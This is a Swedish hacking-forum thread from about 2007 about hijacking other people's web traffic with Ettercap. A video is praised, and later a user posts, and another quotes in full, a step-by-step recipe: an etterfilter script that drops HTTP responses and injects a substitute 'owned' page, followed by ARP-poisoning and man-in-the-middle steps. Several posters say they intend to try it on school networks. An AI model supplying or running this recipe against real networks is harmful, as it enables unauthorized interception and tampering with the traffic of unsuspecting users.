Help - Search - Members - Calendar
Full Version: FILM: Hur du gör airpwn liknande saker i WINDOWS :D
SweRAT > Datasäkerhet > Sårbarheter och intrång
geeken
Vill du lära dig kapa nätverk så är det bara studsa in på följande länk:

http://geeken.mine.nu/pwnage

Ha så kul smile.gif
pikzel
Gillar inte riktigt att "pwna nätverk", men musiken var ju i alla fall bra tongue.gif
Rude
Mycket välgjord video, bra jobbat geeken.

Hur gick det med "koden" föressten? wink.gif
LifeLong
Jag tycker du ska dela med dig av filmen till ännu fler människor, ladda upp den på Milw0rm är en bra idé enligt mig.
geeken
Redan gjort smile.gif mejlade dom för några timmar sedan
Mobility
Mitt första inlägg här!

Måste säga att det var en mycket bra video!
Har dock lite problem med att få det att fungera korrekt.
Direkt när jag drar igång Ettercap så dör nätverket på den "attackerade" datorn, och man är tvungen att förnya ipet för att det ska fungera igen. Ingen webbsida byts med andra ord ut. "Injecting" kommer heller aldrig upp i Ettercap.
Har ett Intel P/W 2200BG och ett Broadcom NetExtreme, har samma problem med båda.
Någon som har nån idé på vad som är fel?

Tack på förhand!
Nuffe
QUOTE(Mobility @ 2007-02-22 21:30) *
Mitt första inlägg här!

Måste säga att det var en mycket bra video!
Har dock lite problem med att få det att fungera korrekt.
Direkt när jag drar igång Ettercap så dör nätverket på den "attackerade" datorn, och man är tvungen att förnya ipet för att det ska fungera igen. Ingen webbsida byts med andra ord ut. "Injecting" kommer heller aldrig upp i Ettercap.
Har ett Intel P/W 2200BG och ett Broadcom NetExtreme, har samma problem med båda.
Någon som har nån idé på vad som är fel?

Tack på förhand!


se till att du har satt routern på Target 1 och de som ska attackeras på Target 2.
Också se till att du Startar sniffandet... annars kommer nätverket vara dött
groil
Riktigt bra film. En blå balettsko med en rosett på till geeken.
dumoflum
jag har en liten fråga

efter man har gjort "attacken" så dör internet på den datorn, finns det något sätt att fixa det utan att behöva starta om den??
Codius
det borde dra igång automatiskt igen så fort du slutar attackera, tror jag
dumoflum
QUOTE
det borde dra igång automatiskt igen så fort du slutar attackera, tror jag


jag var bara lite otålig det går igång en stund efter attacken
LinuZ_
Bra video, skall nån dag testa det på skolans datorer smile.gif
tifius
Nice =) funkade här hemma, får se om jag vågar prova det i skolan (jag känner våran datasnubbe rätt väl, vill inte göra honom ledsen tongue.gif )
Btw, mer DnB for the swedish massive!
linkus
hmm ja kan inte se filmen..."mysko"
Memrix
Verkar tyvärr som våran kamrat sida är nere nu sad.gif *geeken.mine.nu* någon som har kvar videon eller vet vad han gjorde i videon ?
dumoflum
1. ladda ner ettercap
2. gå dit du installera det
3. skapa "haksfilter.txt" (i C:\Program\EttercapNG)
CODE
if (ip.proto == TCP && tcp.src == 80 && search(DATA.data, "text/html"))
{
    drop();
    inject("./filtercontent.txt");
    msg("injecting...\n");
}


4. skapa "filtercontent.txt"
CODE
HTTP/1x200 OK
Content-type: text/html

<html>
<head><title>Dumoflum</title></head>
<body><center><h3>Dumoflum</h3><p><img src="http://0wn3d.dk/owned/owned-fishy.jpg"</p>


<div style=visibility: hidden; position: absolute; left: -999999px;">


5. gå in i cmd och bläddra till "ettercap mappen"

6. skriv "c:\Program\ettercap\etterfilter haksfilter.txt -o replace.ef ((kompilerar))

7.1 starta ettercap/bocka av "promisc mode" under options
7.2 unified sniffning under "sniff"
7.3 välj scan for host under "host"
7.4 host list under "host"
7.5 adda routern till "add to target 1" sen kan du välja många om du vill till "add to target 2"

8. load filter under "filters"

9. ladda replace.ef

10.Arp poisoning under "mitm" välj sedan "sniff remote connetions"

11. start sniffing

hoppas det blev rätt nu
Memrix
QUOTE(dumoflum @ 2007-09-25 17:28) *
1. ladda ner ettercap
2. gå dit du installera det
3. skapa "haksfilter.txt" (i C:\Program\EttercapNG)
CODE
if (ip.proto == TCP && tcp.src == 80 && search(DATA.data, "text/html"))
{
    drop();
    inject("./filtercontent.txt");
    msg("injecting...\n");
}


4. skapa "filtercontent.txt"
CODE
HTTP/1x200 OK
Content-type: text/html

<html>
<head><title>Dumoflum</title></head>
<body><center><h3>Dumoflum</h3><p><img src="http://0wn3d.dk/owned/owned-fishy.jpg"</p>
<div style=visibility: hidden; position: absolute; left: -999999px;">


5. gå in i cmd och bläddra till "ettercap mappen"

6. skriv "c:\Program\ettercap\etterfilter haksfilter.txt -o replace.ef ((kompilerar))

7.1 starta ettercap/bocka av "promisc mode" under options
7.2 unified sniffning under "sniff"
7.3 välj scan for host under "host"
7.4 host list under "host"
7.5 adda routern till "add to target 1" sen kan du välja många om du vill till "add to target 2"

8. load filter under "filters"

9. ladda replace.ef

10.Arp poisoning under "mitm" välj sedan "sniff remote connetions"

11. start sniffing

hoppas det blev rätt nu


Tack så mycket smile.gif Uppskattades verkligen smile.gif
QiporT
Länken är död sad.gif
geeken
Nu ska vi se.. för att svara på hur det gick med "koden" så kan jag säga att koden.mine.nu vart "h4xxad" för ett tag sedan, bildbevis på min sajt nedan smile.gif
Filmen kommer nog upp igen om 10min, har skruvat isär den trasiga laptopen där jag hade filmen, samt pillat in hårddisken i en annan och fnulat lite.. ska se om jag lyckas rädda den biggrin.gif

Lyckas jag så kastar jag upp filmen på www.geeken.se
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2012 Invision Power Services, Inc.